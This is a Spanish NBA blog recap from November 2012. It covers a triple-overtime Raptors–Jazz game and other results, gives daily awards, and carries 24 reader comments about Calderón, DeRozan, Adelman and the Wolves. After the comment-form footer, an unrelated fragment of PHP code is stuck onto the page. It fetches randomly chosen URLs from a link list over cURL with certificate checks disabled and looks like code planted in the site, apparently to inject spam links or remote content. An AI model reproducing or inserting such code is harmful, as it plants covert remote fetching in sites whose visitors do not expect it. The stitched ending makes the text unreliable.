La Crónica: 3 prórrogas en Canadá

13 de November de 2012 por TheDeerHunter

DeRozan cuajó un gran partido pero perdió tras 3 prórrogasGran partido de Calderón y los Raptors. 20 puntos y nada menos que 17 asistencias, haciendo bueno hasta a DeRozan en una de las mejores actuaciones de su carrera (récord de 37 puntos – 16 de 33 en TC – 8 rebotes y 6 asistencias). Faltó profundidad ante unos Jazz altamente compensados, con 7 hombres produciendo mucho. La tríada Jefferson-Millsap-Favors desequilibró la balanza (140-133).

A punto de saltar sorpresa en Detroit. Otra ocasión que se les escapa entre los dedos, ésta ante los Thunder, y acumulan 0-8. Resurgió Stuckey y no fue el día de Durant, pero Westbrook se cargó el equipo a la espalda para remontar en el último cuarto (92-90). Miami también sufrió en Houston ante el trío Harden-Parsons-Asik, en un partido flojo de Lin hoy. Trío contra trío ganaron los campeones, en la mejor actuación de LeBron en lo que va de curso (113-110).

Exhibición de Jennigs, modo MVP, en el Wells Fargo de Philadelphia. Bonito duelo Holiday-Richardson contra Monta Ellis y el propio Jennings… sin embargo el choque se decidió por 17 rebotes de diferencia para los ciervos (105-96). Bynum aún tardará una temporadita en volver y, de momento, Hawes no es Gasol.

En el resto de duelos, vital Rondo rozando el triple doble en la victoria en Chicago (101-95); los Wolves no lamentaron la enfermería llena y  endosaron a Dallas la tercera derrota consecutiva (90-82); los Suns ganaron a Denver por primera vez desde el 2010 (100-110) y los Hawks ganaron en el Rose Garden con una primera parte antológica (95-87).

PREMIOS

MVP: Difícil elegir teniendo en cuenta las grandes actuaciones de hoy. Hasta 4 jugadores ayudaron a la victoria Jennings penetra entre una nube de defensores de Philadelphiade su equipo con más de 30 puntos. Quitamos de la carrera a Millsap ya que para conseguir sus 34 puntos necesitó tres prórrogas. Brandon Jennings lideró bien a su equipo con 33 puntos, 8 asistencias y 5 rebotes, mientras que Westbrook hizo lo propio con 33 puntos y 10 rebotes. Lebron se acercó al triple doble con 38 puntos, 10 rebotes y 6 asistencias. Teniendo en cuenta que Westbrook tenía  a Durant al lado y que se enfrentaba al peor equipo de la competición, y que Lebron estuvo escoltado por Bosh y Wade, nos quedamos con Jennings, que además se enfrentaba a un equipo difícil como Philaldelphia.

Rookie: Poca presencia rookie esta jornada. Destaca Shved que en la victoria de su equipo consiguió 16 puntos y 5 asistencias. De los que compiten por el ROY tan sólo jugaba Lillard y su actuación fue bastante normalita.

Sorpresa: Brutal actuación de Demar DeRozan en Toronto donde tras 3 prórrogas y 60 minutos anotó 37 putnos a los que añadió 8 rebotes y 6 asistencias. También espectacular Calderón, con 20 puntos y nada más y nada menos que 17 asistencias.

Decepción: No hay grandes decepciones hoy, si descontamos la de los aficionados de Detroit que ven noche sí y noche también el desastre en el que se ha convertido su equipo.

Esfuerzo en vano: Perder tras jugar 60 minutos y anotar 37 puntos debe ser una sensación horrorosa. Premio para DeRozan.

Imágenes | AP Photos / Getty Images

Comenta

24 comentarios a esta entrada

  1. ralage dice:
    #1

    Nominarme para MVP a RONDO , que hizo un 20-9-10 (como si nada , añado) en la victoria de los Celtics en Chicago, plis!!
    No los he seguido mucho mas allá de la derrota en Miami, pero algo les tiene que estar pasando a los Nuggets

      Citar

  2. ralage dice:
    #2

    Ahhh sumarle también 5 robos y un 62.5 de TC para Rondo xDD!

      Citar

  3. gabrielj dice:
    #3

    ¿preocupante lo de Kanter? otro partido en el que pasa sin pena ni gloria, 12 minutos en un partido con 3 prorrogas, ya se que no es un jugador destacado aun pero esperaba mucho de el y entre la rotación interior que tiene Utah y que no esta teniendo mucha continuidad… a ver si se va a quedar por el camino, seria una pena

      Citar

  4. HisRoyalAirness dice:
    #4

    MVP? ADELMAN. Ganando en el AA Center a Dallas sin Love, Ricky, Budinger, Barea y Roy.
    Sé que lo estoy mencionando todos los días pero es que los Wolves van 5-2 en el OESTE (sí, en mayúsculas) cuando deberían ir 0-7

      Citar

  5. Esteban dice:
    #5

    deronzan bien o mal, esta temproada esta medianamente justificando su contratazo

      Citar

  6. rumbero dice:
    #6

    HisRoyalAirness:
    MVP? ADELMAN. Ganando en el AA Center a Dallas sin Love, Ricky, Budinger, Barea y Roy.
    Sé que lo estoy mencionando todos los días pero es que los Wolves van 5-2 en el OESTE (sí, en mayúsculas) cuando deberían ir 0-7

    Y el último cuarto sin Pekovic que se lesionó el tobillo. Tiene un mérito de la leche lo que estan haciendo estos Wolves con la enfermería a rebosar. Además que entre sus víctimas estan equipos como los Nets, Pacers o estos Mavs. Casi nada

    ralage:
    No los he seguido mucho mas allá de la derrota en Miami, pero algo les tiene que estar pasando a los Nuggets

    Precisamente después de perder contra Miami encadenaron 4 victorias seguidas, con un Faried desatado y siendo jugador de la semana en el oeste. Karl aun está ajustando el equipo (a nivel ofensivo se ha notado una mejora en estos últimos partidos). Falta que mejoren en el tema de los tiros libres y que Gallo ande más fino en el lanzamiento, pero estos Nuggets deberían ir hacía arriba. Perder en Arizona con estos Suns (que agradable sorpresa) tampoco es una sorpresa

      Citar

  7. Esteban dice:
    #7

    Gabriel comparto q es una pena lo de kanter, es una pena que este en el jazz y no lo traspasen

    Kanter podria ser centro titular en otro equipo, y en lugar de eso mira desde el banco, recuerdan a darko milicic?

    Kanter encajaria de perlas en los bucks, golden state o hawks,
    Habria q buscarle un trade

      Citar

  8. HisRoyalAirness dice:
    #8

    rumbero: Y el último cuarto sin Pekovic que se lesionó el tobillo. Tiene un mérito de la leche lo que estan haciendo estos Wolves con la enfermería a rebosar. Además que entre sus víctimas estan equipos como los Nets, Pacers o estos Mavs. Casi nada

    Precisamente después de perder contra Miami encadenaron 4 victorias seguidas, con un Faried desatado y siendo jugador de la semana en el oeste. Karl aun está ajustando el equipo (a nivel ofensivo se ha notado una mejora en estos últimos partidos). Falta que mejoren en el tema de los tiros libres y que Gallo ande más fino en el lanzamiento, pero estos Nuggets deberían ir hacía arriba. Perder en Arizona con estos Suns (que agradable sorpresa)tampoco es una sorpresa

    A mí es que me está pareciendo una maravilla lo que están haciendo los Wolves. Están jugando muy bien, defendiendo mejor y siendo un equipo coral con una generosidad inusitada.
    Las rotaciones son perfectas, la selección de tiro también y los nuevos están enormes.
    Shved va a terminar siendo el escolta titular cuando vuelva Ricky porque no se corta un pelo a la hora de atacar el aro o anotar y no es en absoluto mal defensor.
    AK está pletórico (y yo no me lo esperaba) aportando en plan Pippen, salvando las distancias, en todos los aspectos del juego.
    Roy, cuando jugó, muy generoso (cosa rara en él) y efectivo.
    El resto aportando, cada uno teniendo su partido para destacar un poco, pero siempre muy buena actitud colectiva.

    No quiero imaginarme lo que puede ser este equipo si todos vuelven sanos. NADIE va a quererlos en playoffs

    Y sí, que traspasen a Kanter coño, a ver si empieza a sumar en la Hoops!

      Citar

  9. Ruxixón dice:
    #9

    Paradójico que el partido de Toronto esté lleno de sorpresas -a tener en cuenta también los 20 de Kleiza- y la única no sorpresa haya sido el resultado:una derrota más y ya están con un balance de 1-6 sólo por encima de los enrachados Wizards y Pistons.

      Citar

  10. Pop dice:
    #10

    Hombre, hay que tener en cuenta en las estadísticas que hubieron 3 prórrogas. Que hubo gente que jugó 60 minutos.

      Citar

  11. Esteban dice:
    #11

    Gran partido de calderon, aun sin las prorrogas estaba en 14 asistencias

    Soy el unico q esta desesperado por ver a calderon en los Mavs?
    Si calderon arreglara una salida del contrato con toronto sobre el limite, cuanto dinero perderia? Cobra la mitad de este año?
    Tengo ilusiones q resigne algun millon con la idea de jugar con un candidato, hoy por hoy Mavs, necesitan un base, con collison no los veo ir a ningun lugar
    Ir al thunder? Moviendo a westbrook de escolta algunos minutos
    Los propios knicks, otro base pero de mayor calidad
    El heat?

    Variso equipos con pretenciones podrian darle un buen papel a un calderon libre, ojala tome nota

      Citar

  12. nba dice:
    #12

    No creo yo que Calderon sea uno de esos que suelen forzar las cosas en sus equipos para conseguir la salida como otros, para bien o para mal, Calderon ha aguantado en la franquicia incluso cuando Jarret Jack le pasaba por encima, supongo que quiere dejar buena impresion en los aficionados, esperar que termine su contrato y ver que le ofrecen por ahi.
    A los Wolves hay ver lo que hacen cuando vuelvan Ricky-Love, al comienzo de la regular es mas facil obtener los resultados que a Royal le sorprenden un poco, pero eso no quita para que Adelman sea un entrenador como la copa de un pino, yo esperare para emitir una opinion hasta el partido contra Clippers, para ver si estos se toman venganza del clucth de Love de la temporada pasada
    Quien creeis que se quedara en Bucks al final de temporada Jennings o Monta? porque parece que Brandon esta haciendo todo lo posible para que un grande se fije en el.
    Lo de Mozgov en Denver no lo termino de entender, tan poco confia en el George Karl.

      Citar

  13. nba dice:
    #13

    Por cierto Royal este deberia ser el nuevo logo de los Wolves
    http://twitter.com/txolara/status/268401354215657472/photo/1
    visto por ahi

      Citar

  14. melo15 dice:
    #14

    Derozan esta en 21-5-3 numeros de all-star, lo que yo decia si los Raptors estuvieran en PO claro, aunque yo creo que el record es mas por el calendario que por otra cosa, ademas se estan quedando muy cerca de llevarse los partidos.

      Citar

  15. HisRoyalAirness dice:
    #15

    Sois conscientes de que Calderón cobra 10 kilos y medio este año?
    Y que nadie va a pagarle eso a un tío que defiende como él? Está muy bien lo de las asistencias pero también hay que mirar los intangibles.
    A ver quién es el guapo que pierde jugadores por valor de 10 millones por Calderón.

    Muy grande ese logo por cierto!! jajaja

      Citar

  16. infante dice:
    #16

    Los numeros de DeRozan merecen que Sancho deje de llamarlo DeZorran, no?

      Citar

  17. Pop dice:
    #17

    Calderón 10 puntos, 8 asistencias, 6 rebotes al descanso. Rozando el triple doble.

      Citar

  18. HisRoyalAirness dice:
    #18

    35 puntos 18 rebotes Varejao??
    Is this real life???

      Citar

  19. simon dice:
    #19

    Si deRozan o deZorran o como querais llega a ser all-star alguna vez yo dejo d ver nba durante 5 años.

      Citar

  20. GreenPride dice:
    #20

    Bueno, de este día vi el partido de los Celtics y los Bulls.
    Buen partido de los Celtics que consiguieron la victoria en una cancha siempre difícil yendo por delante desde el salto inicial. En general partido serio de Boston con Rondo marcando la pauta, Garnett liderando la defensa y aportando en ataque, Terry que empieza a coger el hilo y aportaciones de Wilcox y Bass. Jeff Green aún muy intermitente y poco agresivo de cara al aro y Pierce jugó un partido mediocre pero la buena noticia es que la defensa empieza a parecerse a la de temporadas anteriores para los de Boston y por ahí deben llegar sus éxitos. Aún así una pájara tremenda en el último cuarto sirvió para meter a los Bulls en el partido y que tuvieran sus opciones que desperdiciaron con varios ataques consecutivos tirados y al final la pizarra de Doc y el buen hacer de Rondo-Garnett en el 2×2 acabaron con el partido. Por los Bulls bien a ratos Deng y Noah, empezó muy bien Boozer para luego hacer lo de siempre desaparecer según pasaba el partido y acabarlo en el banquillo con Gibson en el parquet. Los Bulls fueron claramente inferiores la mayoria del partido pero nunca se rindieron y apretaron en el último cuarto. La falta de un jugador decisivo les va a costar muchos partidos este año.

      Citar

  21. Pikerton64 dice:
    #21

    Yo estuve muy descolgado de la NBA desde que me quitaron Sportmanía de ONO hace unos 8-9 años y antes de eso, en la época en la que McGrady, Iverson, Carter y Kobe eran dioses, era aún un niño de 9-10 años. Volví el año pasado cuando Ricky aterrizaba en las Twin Cities y de la mano de una página de fútbol de la que me descargué sus 41 partidos más el siguiente a su lesión. Por ello, fue a partir del año pasado desde que pude empezar a hablar con algo más de autoridad sobre NBA. Me fijé ya en aspectos como la defensa o los entrenadores más allá de en lo que uno se fija siendo niño: los mates y tapones, xd.

    Toda esta introducción es para aclarar que no viví ni soy consciente de los dios que pudo ser Adelman en el pasado (SAC, HOU), lo que no sé si juega a mi favor (por hablar con “objetividad” del presente) o en mi contra. Lo que yo vi de él el año pasado es que, y no por el equipo que tenía, lo hizo mal. Ejemplo: partidos que ganábamos de 10, sentaba a los titulares (Ricky, Luv, Pek) y metía a Barea, este se tiraba tres triples en transición, fallaba, Adelman no decía nada, nos remontaban, se nos iban de diez y por fin ahí pedía tiempo muerto. Ahora sí que no seré objetivo, pero tampoco está tan alejado de la realidad. Ricky entraba luego, remontaba él solito con su juego tan fresco, veloz y preciso y perdíamos igualmente. Está claro que Love es la estrella, pero a falta de entrenador y guía Ricky se echó el equipo a su espalda y dirigió como líder al equipo (dentro de la cancha, fuera era Love obviamente).
    Por el contrario, este año estoy flipando con Adelman, ya que estoy súper satisfecho de lo que está haciendo y no me lo esperaba, repito, porque el año pasado no hizo nada bien, a mi parecer. Las rotaciones por fin las está haciendo bien (si no fuera por las lesiones Amudson no jugaría, ¡bien!) (al igual que Lee y Conroy), mete a los que se están luciendo (cosa obvia que el año pasado no hacía, bien al contrario sentaba a todo jugador que empezara a salirse), castiga (como entiendo hizo con DWill el partido contra Dallas), defiende, usa bien el banquillo (dejando por ejemplo a Shved de 6° hombre tras la lesión de Barea), etc. Y estoy muy contento por ello.

    Haría ahora otro análisis Wolf, pero ya he escrito demasiado y no quiero seguir aburriendo ^^U

      Citar

  22. Sancho88 dice:
    #22

    Sobre las rotaciones de Adelman habrïa mucho que decir: En Sactown nunca lo hizo del todo bien con los jugadores interiores; pero tambiën descubriö a Salmons en sus inicios; y creö de la nada a Brad Miller: No së; es un tipo que tiene la habilidad de inventarse jugadores y crear tipos de medio o medio alto nivel en la liga con muchïsima facilidad: Fïjate si no este año ha creado a Cunningham; el año pasado a Pekovic; recupera a Roy para el baloncesto; Barea; Ridnour::: es un tïo que gestiona fenomenal lo que tiene; sus equipos juegan divertidos pero a la vez sencillos y no së como lo consigue; pero siempre consigue enganchar al aficionado: Creo que la clave radica en que le encanta el basket muy por encima de su puesto como entrenador; y entrena tal y como ël quisiera ver un partido de baloncesto: Gente como Adelman o Rivers dan prestigio en los banquillos de la NBA

      Citar

  23. Pop dice:
    #23

    Pikerton64:

    Si tu gusto por la NBA viene de aquella época de finales de los 90-principios de los 00, a lo mejor recuerdas a los eléctricos Sacramento Kings, uno de los equipos más divertidos y espectaculares de los últimos 15 años, sino el que más. Adelman tuvo mucho que ver…

      Citar

  24. rumbero dice:
    #24

    Yo sin haberme visto esos 41 partidos de antes de la lesión de Ricky tengo que romper una lanza a favor de Adelman 😀 Que llegara al 50% de victorias en el Oeste antes que cayera Ricky y luego el resto no es poco. Y yo si le voy a dar importancia al equipo que tenía, porque no es lo mismo tener que rotar con tios como Webster, Johnson, Trolliver o Milicic que con lo que tiene ahora. No hay comparación. Además lo comentaba el otro dia en otro hilo y sigo en la línea de lo que dice Sancho, Adelman es un tio que suele aprovechar muy bien lo que tiene, pero si además estos jugadores tienen un par de luces y entienden lo que que tienen que hacer, bingo. Sirva como ejemplo Budinger, que seguramente tendrá menos talento que Beasley pero siempre funcionará mucho mejor en un equipo de Adelman.

    Todo esto no quita que se puedan cuestionar sus cambios por supuesto, que todos la cagan y aqui estamos para darles palos. ¡McHale, no mandes a nuestros niños a la D-League, que te crees que vas a llegar a PO pero no!

    (Falta un comentario, HisRoyal te invocamos)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>